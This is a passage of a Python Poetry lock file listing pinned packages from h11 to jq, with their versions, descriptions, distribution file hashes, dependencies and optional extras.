"h11" version = "0.14.0" description = "A pure-Python, bring-your-own-I/O implementation of HTTP/1.1" optional = false python-versions = ">=3.7" files = [ {file = "h11-0.14.0-py3-none-any.whl", hash = "sha256:e3fe4ac4b851c468cc8363d500db52c2ead036020723024a109d37346efaa761"}, {file = "h11-0.14.0.tar.gz", hash = "sha256:8f19fbbe99e72420ff35c00b27a34cb9937e902a8b810e2c88300c6f0a3b699d"}, ] [[package]] name = "h2" version = "4.1.0" description = "HTTP/2 State-Machine based protocol implementation" optional = true python-versions = ">=3.6.1" files = [ {file = "h2-4.1.0-py3-none-any.whl", hash = "sha256:03a46bcf682256c95b5fd9e9a99c1323584c3eec6440d379b9903d709476bc6d"}, {file = "h2-4.1.0.tar.gz", hash = "sha256:a83aca08fbe7aacb79fec788c9c0bac936343560ed9ec18b82a13a12c28d2abb"}, ] [package.dependencies] hpack = ">=4.0,<5" hyperframe = ">=6.0,<7" [[package]] name = "h5py" version = "3.10.0" description = "Read and write HDF5 files from Python" optional = true python-versions = ">=3.8" files = [ {file = "h5py-3.10.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:b963fb772964fc1d1563c57e4e2e874022ce11f75ddc6df1a626f42bd49ab99f"}, {file = "h5py-3.10.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:012ab448590e3c4f5a8dd0f3533255bc57f80629bf7c5054cf4c87b30085063c"}, {file = "h5py-3.10.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:781a24263c1270a62cd67be59f293e62b76acfcc207afa6384961762bb88ea03"}, {file = "h5py-3.10.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f42e6c30698b520f0295d70157c4e202a9e402406f50dc08f5a7bc416b24e52d"}, {file = "h5py-3.10.0-cp310-cp310-win_amd64.whl", hash = "sha256:93dd840bd675787fc0b016f7a05fc6efe37312a08849d9dd4053fd0377b1357f"}, {file = "h5py-3.10.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2381e98af081b6df7f6db300cd88f88e740649d77736e4b53db522d8874bf2dc"}, {file = "h5py-3.10.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:667fe23ab33d5a8a6b77970b229e14ae3bb84e4ea3382cc08567a02e1499eedd"}, {file = "h5py-3.10.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:90286b79abd085e4e65e07c1bd7ee65a0f15818ea107f44b175d2dfe1a4674b7"}, {file = "h5py-3.10.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c013d2e79c00f28ffd0cc24e68665ea03ae9069e167087b2adb5727d2736a52"}, {file = "h5py-3.10.0-cp311-cp311-win_amd64.whl", hash = "sha256:92273ce69ae4983dadb898fd4d3bea5eb90820df953b401282ee69ad648df684"}, {file = "h5py-3.10.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:3c97d03f87f215e7759a354460fb4b0d0f27001450b18b23e556e7856a0b21c3"}, {file = "h5py-3.10.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:86df4c2de68257b8539a18646ceccdcf2c1ce6b1768ada16c8dcfb489eafae20"}, {file = "h5py-3.10.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba9ab36be991119a3ff32d0c7cbe5faf9b8d2375b5278b2aea64effbeba66039"}, {file = "h5py-3.10.0-cp312-cp312-win_amd64.whl", hash = "sha256:2c8e4fda19eb769e9a678592e67eaec3a2f069f7570c82d2da909c077aa94339"}, {file = "h5py-3.10.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:492305a074327e8d2513011fa9fffeb54ecb28a04ca4c4227d7e1e9616d35641"}, {file = "h5py-3.10.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:9450464b458cca2c86252b624279115dcaa7260a40d3cb1594bf2b410a2bd1a3"}, {file = "h5py-3.10.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fd6f6d1384a9f491732cee233b99cd4bfd6e838a8815cc86722f9d2ee64032af"}, {file = "h5py-3.10.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3074ec45d3dc6e178c6f96834cf8108bf4a60ccb5ab044e16909580352010a97"}, {file = "h5py-3.10.0-cp38-cp38-win_amd64.whl", hash = "sha256:212bb997a91e6a895ce5e2f365ba764debeaef5d2dca5c6fb7098d66607adf99"}, {file = "h5py-3.10.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5dfc65ac21fa2f630323c92453cadbe8d4f504726ec42f6a56cf80c2f90d6c52"}, {file = "h5py-3.10.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:d4682b94fd36ab217352be438abd44c8f357c5449b8995e63886b431d260f3d3"}, {file = "h5py-3.10.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:aece0e2e1ed2aab076c41802e50a0c3e5ef8816d60ece39107d68717d4559824"}, {file = "h5py-3.10.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:43a61b2c2ad65b1fabc28802d133eed34debcc2c8b420cb213d3d4ef4d3e2229"}, {file = "h5py-3.10.0-cp39-cp39-win_amd64.whl", hash = "sha256:ae2f0201c950059676455daf92700eeb57dcf5caaf71b9e1328e6e6593601770"}, {file = "h5py-3.10.0.tar.gz", hash = "sha256:d93adc48ceeb33347eb24a634fb787efc7ae4644e6ea4ba733d099605045c049"}, ] [package.dependencies] numpy = ">=1.17.3" [[package]] name = "hnswlib" version = "0.7.0" description = "hnswlib" optional = true python-versions = "*" files = [ {file = "hnswlib-0.7.0.tar.gz", hash = "sha256:bc459668e7e44bb7454b256b90c98c5af750653919d9a91698dafcf416cf64c4"}, ] [package.dependencies] numpy = "*" [[package]] name = "hpack" version = "4.0.0" description = "Pure-Python HPACK header compression" optional = true python-versions = ">=3.6.1" files = [ {file = "hpack-4.0.0-py3-none-any.whl", hash = "sha256:84a076fad3dc9a9f8063ccb8041ef100867b1878b25ef0ee63847a5d53818a6c"}, {file = "hpack-4.0.0.tar.gz", hash = "sha256:fc41de0c63e687ebffde81187a948221294896f6bdc0ae2312708df339430095"}, ] [[package]] name = "html2text" version = "2020.1.16" description = "Turn HTML into equivalent Markdown-structured text." optional = true python-versions = ">=3.5" files = [ {file = "html2text-2020.1.16-py3-none-any.whl", hash = "sha256:c7c629882da0cf377d66f073329ccf34a12ed2adf0169b9285ae4e63ef54c82b"}, {file = "html2text-2020.1.16.tar.gz", hash = "sha256:e296318e16b059ddb97f7a8a1d6a5c1d7af4544049a01e261731d2d5cc277bbb"}, ] [[package]] name = "httpcore" version = "0.18.0" description = "A minimal low-level HTTP client." optional = false python-versions = ">=3.8" files = [ {file = "httpcore-0.18.0-py3-none-any.whl", hash = "sha256:adc5398ee0a476567bf87467063ee63584a8bce86078bf748e48754f60202ced"}, {file = "httpcore-0.18.0.tar.gz", hash = "sha256:13b5e5cd1dca1a6636a6aaea212b19f4f85cd88c366a2b82304181b769aab3c9"}, ] [package.dependencies] anyio = ">=3.0,<5.0" certifi = "*" h11 = ">=0.13,<0.15" sniffio = "==1.*" [package.extras] http2 = ["h2 (>=3,<5)"] socks = ["socksio (==1.*)"] [[package]] name = "httplib2" version = "0.22.0" description = "A comprehensive HTTP client library." optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "httplib2-0.22.0-py3-none-any.whl", hash = "sha256:14ae0a53c1ba8f3d37e9e27cf37eabb0fb9980f435ba405d546948b009dd64dc"}, {file = "httplib2-0.22.0.tar.gz", hash = "sha256:d7a10bc5ef5ab08322488bde8c726eeee5c8618723fdb399597ec58f3d82df81"}, ] [package.dependencies] pyparsing = {version = ">=2.4.2,<3.0.0 || >3.0.0,<3.0.1 || >3.0.1,<3.0.2 || >3.0.2,<3.0.3 || >3.0.3,<4", markers = "python_version > \"3.0\""} [[package]] name = "httpx" version = "0.25.0" description = "The next generation HTTP client." optional = false python-versions = ">=3.8" files = [ {file = "httpx-0.25.0-py3-none-any.whl", hash = "sha256:181ea7f8ba3a82578be86ef4171554dd45fec26a02556a744db029a0a27b7100"}, {file = "httpx-0.25.0.tar.gz", hash = "sha256:47ecda285389cb32bb2691cc6e069e3ab0205956f681c5b2ad2325719751d875"}, ] [package.dependencies] brotli = {version = "*", optional = true, markers = "platform_python_implementation == \"CPython\" and extra == \"brotli\""} brotlicffi = {version = "*", optional = true, markers = "platform_python_implementation != \"CPython\" and extra == \"brotli\""} certifi = "*" h2 = {version = ">=3,<5", optional = true, markers = "extra == \"http2\""} httpcore = ">=0.18.0,<0.19.0" idna = "*" sniffio = "*" socksio = {version = "==1.*", optional = true, markers = "extra == \"socks\""} [package.extras] brotli = ["brotli", "brotlicffi"] cli = ["click (==8.*)", "pygments (==2.*)", "rich (>=10,<14)"] http2 = ["h2 (>=3,<5)"] socks = ["socksio (==1.*)"] [[package]] name = "huggingface-hub" version = "0.18.0" description = "Client library to download and publish models, datasets and other repos on the huggingface.co hub" optional = true python-versions = ">=3.8.0" files = [ {file = "huggingface_hub-0.18.0-py3-none-any.whl", hash = "sha256:ee0b6b68acbf6aeb6d083ea081e981c277a1104b82ab67fdf6780ff5396830af"}, {file = "huggingface_hub-0.18.0.tar.gz", hash = "sha256:10eda12b9c1cfa800b4b7c096b3ace8843734c3f28d69d1c243743fb7d7a2e81"}, ] [package.dependencies] filelock = "*" fsspec = ">=2023.5.0" packaging = ">=20.9" pyyaml = ">=5.1" requests = "*" tqdm = ">=4.42.1" typing-extensions = ">=3.7.4.3" [package.extras] all = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "black (==23.7)", "gradio", "jedi", "mypy (==1.5.1)", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "ruff (>=0.0.241)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "urllib3 (<2.0)"] cli = ["InquirerPy (==0.3.4)"] dev = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "black (==23.7)", "gradio", "jedi", "mypy (==1.5.1)", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "ruff (>=0.0.241)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "urllib3 (<2.0)"] docs = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "black (==23.7)", "gradio", "hf-doc-builder", "jedi", "mypy (==1.5.1)", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "ruff (>=0.0.241)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "urllib3 (<2.0)", "watchdog"] fastai = ["fastai (>=2.4)", "fastcore (>=1.3.27)", "toml"] inference = ["aiohttp", "pydantic (<2.0)"] quality = ["black (==23.7)", "mypy (==1.5.1)", "ruff (>=0.0.241)"] tensorflow = ["graphviz", "pydot", "tensorflow"] testing = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "gradio", "jedi", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "soundfile", "urllib3 (<2.0)"] torch = ["torch"] typing = ["pydantic (<2.0)", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3"] [[package]] name = "humanfriendly" version = "10.0" description = "Human friendly output for text interfaces using Python" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "humanfriendly-10.0-py2.py3-none-any.whl", hash = "sha256:1697e1a8a8f550fd43c2865cd84542fc175a61dcb779b6fee18cf6b6ccba1477"}, {file = "humanfriendly-10.0.tar.gz", hash = "sha256:6b0b831ce8f15f7300721aa49829fc4e83921a9a301cc7f606be6686a2288ddc"}, ] [package.dependencies] pyreadline3 = {version = "*", markers = "sys_platform == \"win32\" and python_version >= \"3.8\""} [[package]] name = "humbug" version = "0.3.2" description = "Humbug: Do you build developer tools? Humbug helps you know your users." optional = true python-versions = "*" files = [ {file = "humbug-0.3.2-py3-none-any.whl", hash = "sha256:0d302c82019842f4267ed05b54a26b155ab8dc441ac129e2a62c9c4892d53c71"}, {file = "humbug-0.3.2.tar.gz", hash = "sha256:0fca3cdb6db2348e13d7835b1a743ff545e38344fc55ad4e2a083634b12a0a6e"}, ] [package.dependencies] requests = "*" [package.extras] dev = ["black", "mypy", "types-dataclasses", "types-pkg-resources", "types-psutil", "types-requests", "wheel"] distribute = ["setuptools", "twine", "wheel"] profile = ["GPUtil", "psutil", "types-psutil"] [[package]] name = "hyperframe" version = "6.0.1" description = "HTTP/2 framing layer for Python" optional = true python-versions = ">=3.6.1" files = [ {file = "hyperframe-6.0.1-py3-none-any.whl", hash = "sha256:0ec6bafd80d8ad2195c4f03aacba3a8265e57bc4cff261e802bf39970ed02a15"}, {file = "hyperframe-6.0.1.tar.gz", hash = "sha256:ae510046231dc8e9ecb1a6586f63d2347bf4c8905914aa84ba585ae85f28a914"}, ] [[package]] name = "idna" version = "3.4" description = "Internationalized Domain Names in Applications (IDNA)" optional = false python-versions = ">=3.5" files = [ {file = "idna-3.4-py3-none-any.whl", hash = "sha256:90b77e79eaa3eba6de819a0c442c0b4ceefc341a7a2ab77d7562bf49f425c5c2"}, {file = "idna-3.4.tar.gz", hash = "sha256:814f528e8dead7d329833b91c5faa87d60bf71824cd12a7530b5526063d02cb4"}, ] [[package]] name = "importlib-metadata" version = "6.8.0" description = "Read metadata from Python packages" optional = false python-versions = ">=3.8" files = [ {file = "importlib_metadata-6.8.0-py3-none-any.whl", hash = "sha256:3ebb78df84a805d7698245025b975d9d67053cd94c79245ba4b3eb694abe68bb"}, {file = "importlib_metadata-6.8.0.tar.gz", hash = "sha256:dbace7892d8c0c4ac1ad096662232f831d4e64f4c4545bd53016a3e9d4654743"}, ] [package.dependencies] zipp = ">=0.5" [package.extras] docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"] perf = ["ipython"] testing = ["flufl.flake8", "importlib-resources (>=1.3)", "packaging", "pyfakefs", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=2.2)", "pytest-mypy (>=0.9.1)", "pytest-perf (>=0.9.2)", "pytest-ruff"] [[package]] name = "importlib-resources" version = "6.1.0" description = "Read resources from Python packages" optional = false python-versions = ">=3.8" files = [ {file = "importlib_resources-6.1.0-py3-none-any.whl", hash = "sha256:aa50258bbfa56d4e33fbd8aa3ef48ded10d1735f11532b8df95388cc6bdb7e83"}, {file = "importlib_resources-6.1.0.tar.gz", hash = "sha256:9d48dcccc213325e810fd723e7fbb45ccb39f6cf5c31f00cf2b965f5f10f3cb9"}, ] [package.dependencies] zipp = {version = ">=3.1.0", markers = "python_version < \"3.10\""} [package.extras] docs = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (<7.2.5)", "sphinx (>=3.5)", "sphinx-lint"] testing = ["pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=2.2)", "pytest-mypy (>=0.9.1)", "pytest-ruff", "zipp (>=3.17)"] [[package]] name = "iniconfig" version = "2.0.0" description = "brain-dead simple config-ini parsing" optional = false python-versions = ">=3.7" files = [ {file = "iniconfig-2.0.0-py3-none-any.whl", hash = "sha256:b6a85871a79d2e3b22d2d1b94ac2824226a63c6b741c88f7ae975f18b6778374"}, {file = "iniconfig-2.0.0.tar.gz", hash = "sha256:2d91e135bf72d31a410b17c16da610a82cb55f6b0477d1a902134b24a455b8b3"}, ] [[package]] name = "ipykernel" version = "6.26.0" description = "IPython Kernel for Jupyter" optional = false python-versions = ">=3.8" files = [ {file = "ipykernel-6.26.0-py3-none-any.whl", hash = "sha256:3ba3dc97424b87b31bb46586b5167b3161b32d7820b9201a9e698c71e271602c"}, {file = "ipykernel-6.26.0.tar.gz", hash = "sha256:553856658eb8430bbe9653ea041a41bff63e9606fc4628873fc92a6cf3abd404"}, ] [package.dependencies] appnope = {version = "*", markers = "platform_system == \"Darwin\""} comm = ">=0.1.1" debugpy = ">=1.6.5" ipython = ">=7.23.1" jupyter-client = ">=6.1.12" jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" matplotlib-inline = ">=0.1" nest-asyncio = "*" packaging = "*" psutil = "*" pyzmq = ">=20" tornado = ">=6.1" traitlets = ">=5.4.0" [package.extras] cov = ["coverage[toml]", "curio", "matplotlib", "pytest-cov", "trio"] docs = ["myst-parser", "pydata-sphinx-theme", "sphinx", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-spelling", "trio"] pyqt5 = ["pyqt5"] pyside6 = ["pyside6"] test = ["flaky", "ipyparallel", "pre-commit", "pytest (>=7.0)", "pytest-asyncio", "pytest-cov", "pytest-timeout"] [[package]] name = "ipython" version = "8.12.3" description = "IPython: Productive Interactive Computing" optional = false python-versions = ">=3.8" files = [ {file = "ipython-8.12.3-py3-none-any.whl", hash = "sha256:b0340d46a933d27c657b211a329d0be23793c36595acf9e6ef4164bc01a1804c"}, {file = "ipython-8.12.3.tar.gz", hash = "sha256:3910c4b54543c2ad73d06579aa771041b7d5707b033bd488669b4cf544e3b363"}, ] [package.dependencies] appnope = {version = "*", markers = "sys_platform == \"darwin\""} backcall = "*" colorama = {version = "*", markers = "sys_platform == \"win32\""} decorator = "*" jedi = ">=0.16" matplotlib-inline = "*" pexpect = {version = ">4.3", markers = "sys_platform != \"win32\""} pickleshare = "*" prompt-toolkit = ">=3.0.30,<3.0.37 || >3.0.37,<3.1.0" pygments = ">=2.4.0" stack-data = "*" traitlets = ">=5" typing-extensions = {version = "*", markers = "python_version < \"3.10\""} [package.extras] all = ["black", "curio", "docrepr", "ipykernel", "ipyparallel", "ipywidgets", "matplotlib", "matplotlib (!=3.2.0)", "nbconvert", "nbformat", "notebook", "numpy (>=1.21)", "pandas", "pytest (<7)", "pytest (<7.1)", "pytest-asyncio", "qtconsole", "setuptools (>=18.5)", "sphinx (>=1.3)", "sphinx-rtd-theme", "stack-data", "testpath", "trio", "typing-extensions"] black = ["black"] doc = ["docrepr", "ipykernel", "matplotlib", "pytest (<7)", "pytest (<7.1)", "pytest-asyncio", "setuptools (>=18.5)", "sphinx (>=1.3)", "sphinx-rtd-theme", "stack-data", "testpath", "typing-extensions"] kernel = ["ipykernel"] nbconvert = ["nbconvert"] nbformat = ["nbformat"] notebook = ["ipywidgets", "notebook"] parallel = ["ipyparallel"] qtconsole = ["qtconsole"] test = ["pytest (<7.1)", "pytest-asyncio", "testpath"] test-extra = ["curio", "matplotlib (!=3.2.0)", "nbformat", "numpy (>=1.21)", "pandas", "pytest (<7.1)", "pytest-asyncio", "testpath", "trio"] [[package]] name = "ipython-genutils" version = "0.2.0" description = "Vestigial utilities from IPython" optional = false python-versions = "*" files = [ {file = "ipython_genutils-0.2.0-py2.py3-none-any.whl", hash = "sha256:72dd37233799e619666c9f639a9da83c34013a73e8bbc79a7a6348d93c61fab8"}, {file = "ipython_genutils-0.2.0.tar.gz", hash = "sha256:eb2e116e75ecef9d4d228fdc66af54269afa26ab4463042e33785b887c628ba8"}, ] [[package]] name = "ipywidgets" version = "8.1.1" description = "Jupyter interactive widgets" optional = false python-versions = ">=3.7" files = [ {file = "ipywidgets-8.1.1-py3-none-any.whl", hash = "sha256:2b88d728656aea3bbfd05d32c747cfd0078f9d7e159cf982433b58ad717eed7f"}, {file = "ipywidgets-8.1.1.tar.gz", hash = "sha256:40211efb556adec6fa450ccc2a77d59ca44a060f4f9f136833df59c9f538e6e8"}, ] [package.dependencies] comm = ">=0.1.3" ipython = ">=6.1.0" jupyterlab-widgets = ">=3.0.9,<3.1.0" traitlets = ">=4.3.1" widgetsnbextension = ">=4.0.9,<4.1.0" [package.extras] test = ["ipykernel", "jsonschema", "pytest (>=3.6.0)", "pytest-cov", "pytz"] [[package]] name = "isodate" version = "0.6.1" description = "An ISO 8601 date/time/duration parser and formatter" optional = true python-versions = "*" files = [ {file = "isodate-0.6.1-py2.py3-none-any.whl", hash = "sha256:0751eece944162659049d35f4f549ed815792b38793f07cf73381c1c87cbed96"}, {file = "isodate-0.6.1.tar.gz", hash = "sha256:48c5881de7e8b0a0d648cb024c8062dc84e7b840ed81e864c7614fd3c127bde9"}, ] [package.dependencies] six = "*" [[package]] name = "isoduration" version = "20.11.0" description = "Operations with ISO 8601 durations" optional = false python-versions = ">=3.7" files = [ {file = "isoduration-20.11.0-py3-none-any.whl", hash = "sha256:b2904c2a4228c3d44f409c8ae8e2370eb21a26f7ac2ec5446df141dde3452042"}, {file = "isoduration-20.11.0.tar.gz", hash = "sha256:ac2f9015137935279eac671f94f89eb00584f940f5dc49462a0c4ee692ba1bd9"}, ] [package.dependencies] arrow = ">=0.15.0" [[package]] name = "jaraco-context" version = "4.3.0" description = "Context managers by jaraco" optional = true python-versions = ">=3.7" files = [ {file = "jaraco.context-4.3.0-py3-none-any.whl", hash = "sha256:5d9e95ca0faa78943ed66f6bc658dd637430f16125d86988e77844c741ff2f11"}, {file = "jaraco.context-4.3.0.tar.gz", hash = "sha256:4dad2404540b936a20acedec53355bdaea223acb88fd329fa6de9261c941566e"}, ] [package.extras] docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"] testing = ["flake8 (<5)", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-flake8", "pytest-mypy (>=0.9.1)"] [[package]] name = "jedi" version = "0.19.1" description = "An autocompletion tool for Python that can be used for text editors." optional = false python-versions = ">=3.6" files = [ {file = "jedi-0.19.1-py2.py3-none-any.whl", hash = "sha256:e983c654fe5c02867aef4cdfce5a2fbb4a50adc0af145f70504238f18ef5e7e0"}, {file = "jedi-0.19.1.tar.gz", hash = "sha256:cf0496f3651bc65d7174ac1b7d043eff454892c708a87d1b683e57b569927ffd"}, ] [package.dependencies] parso = ">=0.8.3,<0.9.0" [package.extras] docs = ["Jinja2 (==2.11.3)", "MarkupSafe (==1.1.1)", "Pygments (==2.8.1)", "alabaster (==0.7.12)", "babel (==2.9.1)", "chardet (==4.0.0)", "commonmark (==0.8.1)", "docutils (==0.17.1)", "future (==0.18.2)", "idna (==2.10)", "imagesize (==1.2.0)", "mock (==1.0.1)", "packaging (==20.9)", "pyparsing (==2.4.7)", "pytz (==2021.1)", "readthedocs-sphinx-ext (==2.1.4)", "recommonmark (==0.5.0)", "requests (==2.25.1)", "six (==1.15.0)", "snowballstemmer (==2.1.0)", "sphinx (==1.8.5)", "sphinx-rtd-theme (==0.4.3)", "sphinxcontrib-serializinghtml (==1.1.4)", "sphinxcontrib-websupport (==1.2.4)", "urllib3 (==1.26.4)"] qa = ["flake8 (==5.0.4)", "mypy (==0.971)", "types-setuptools (==67.2.0.1)"] testing = ["Django", "attrs", "colorama", "docopt", "pytest (<7.0.0)"] [[package]] name = "jieba3k" version = "0.35.1" description = "Chinese Words Segementation Utilities" optional = true python-versions = "*" files = [ {file = "jieba3k-0.35.1.zip", hash = "sha256:980a4f2636b778d312518066be90c7697d410dd5a472385f5afced71a2db1c10"}, ] [[package]] name = "jinja2" version = "3.1.2" description = "A very fast and expressive template engine." optional = false python-versions = ">=3.7" files = [ {file = "Jinja2-3.1.2-py3-none-any.whl", hash = "sha256:6088930bfe239f0e6710546ab9c19c9ef35e29792895fed6e6e31a023a182a61"}, {file = "Jinja2-3.1.2.tar.gz", hash = "sha256:31351a702a408a9e7595a8fc6150fc3f43bb6bf7e319770cbc0db9df9437e852"}, ] [package.dependencies] MarkupSafe = ">=2.0" [package.extras] i18n = ["Babel (>=2.7)"] [[package]] name = "jmespath" version = "1.0.1" description = "JSON Matching Expressions" optional = true python-versions = ">=3.7" files = [ {file = "jmespath-1.0.1-py3-none-any.whl", hash = "sha256:02e2e4cc71b5bcab88332eebf907519190dd9e6e82107fa7f83b1003a6252980"}, {file = "jmespath-1.0.1.tar.gz", hash = "sha256:90261b206d6defd58fdd5e85f478bf633a2901798906be2ad389150c5c60edbe"}, ] [[package]] name = "joblib" version = "1.3.2" description = "Lightweight pipelining with Python functions" optional = true python-versions = ">=3.7" files = [ {file = "joblib-1.3.2-py3-none-any.whl", hash = "sha256:ef4331c65f239985f3f2220ecc87db222f08fd22097a3dd5698f693875f8cbb9"}, {file = "joblib-1.3.2.tar.gz", hash = "sha256:92f865e621e17784e7955080b6d042489e3b8e294949cc44c6eac304f59772b1"}, ] [[package]] name = "jq" version = "1.6.0" description = "jq is a lightweight and flexible JSON processor." optional = true python-versions = ">=3.5" files = [ {file = "jq-1.6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:5773851cfb9ec6525f362f5bf7f18adab5c1fd1f0161c3599264cd0118c799da"}, {file = "jq-1.6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:a758df4eae767a21ebd8466dfd0066d99c9741d9f7fd4a7e1d5b5227e1924af7"}, {file = "jq-1.6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:15cf9dd3e7fb40d029f12f60cf418374c0b830a6ea6267dd285b48809069d6af"}, {file = "jq-1.6.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c7e768cf5c25d703d944ef81c787d745da0eb266a97768f3003f91c4c828118d"}, {file = "jq-1.6.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:85a697b3cdc65e787f90faa1237caa44c117b6b2853f21263c3f0b16661b192c"}, {file = "jq-1.6.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:944e081c328501ddc0a22a8f08196df72afe7910ca11e1a1f21244410dbdd3b3"}, {file = "jq-1.6.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:09262d0e0cafb03acc968622e6450bb08abfb14c793bab47afd2732b47c655fd"}, {file = "jq-1.6.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:611f460f616f957d57e0da52ac6e1e6294b073c72a89651da5546a31347817bd"}, {file = "jq-1.6.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aba35b5cc07cd75202148e55f47ede3f4d0819b51c80f6d0c82a2ca47db07189"}, {file = "jq-1.6.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ef5ddb76b03610df19a53583348aed3604f21d0ba6b583ee8d079e8df026cd47"}, {file = "jq-1.6.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:872f322ff7bfd7daff41b7e8248d414a88722df0e82d1027f3b091a438543e63"}, {file = "jq-1.6.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ca7a2982ff26f4620ac03099542a0230dabd8787af3f03ac93660598e26acbf0"}, {file = "jq-1.6.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:316affc6debf15eb05b7fd8e84ebf8993042b10b840e8d2a504659fb3ba07992"}, {file = "jq-1.6.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:9bc42ade4de77fe4370c0e8e105ef10ad1821ef74d61dcc70982178b9ecfdc72"}, {file = "jq-1.6.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:02da59230912b886ed45489f3693ce75877f3e99c9e490c0a2dbcf0db397e0df"}, {file = "jq-1.6.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:7ea39f89aa469eb12145ddd686248916cd6d186647aa40b319af8444b1f45a2d"}, {file = "jq-1.6.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:6e9016f5ba064fabc527adb609ebae1f27cac20c8e0da990abae1cfb12eca706"}, {file = "jq-1.6.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:022be104a548f7fbddf103ce749937956df9d37a4f2f1650396dacad73bce7ee"}, {file = "jq-1.6.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d5a7f31f779e1aa3d165eaec237d74c7f5728227e81023a576c939ba3da34f8"}, {file = "jq-1.6.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5f1533a2a15c42be3368878b4031b12f30441246878e0b5f6bedfdd7828cdb1f"}, {file = "jq-1.6.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8aa67a304e58aa85c550ec011a68754ae49abe227b37d63a351feef4eea4c7a7"}, {file = "jq-1.6.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0893d1590cfa6facaf787cc6c28ac51e47d0d06a303613f84d4943ac0ca98e32"}, {file = "jq-1.6.0-cp312-cp312-musllinux_1_1_i686.whl", hash = 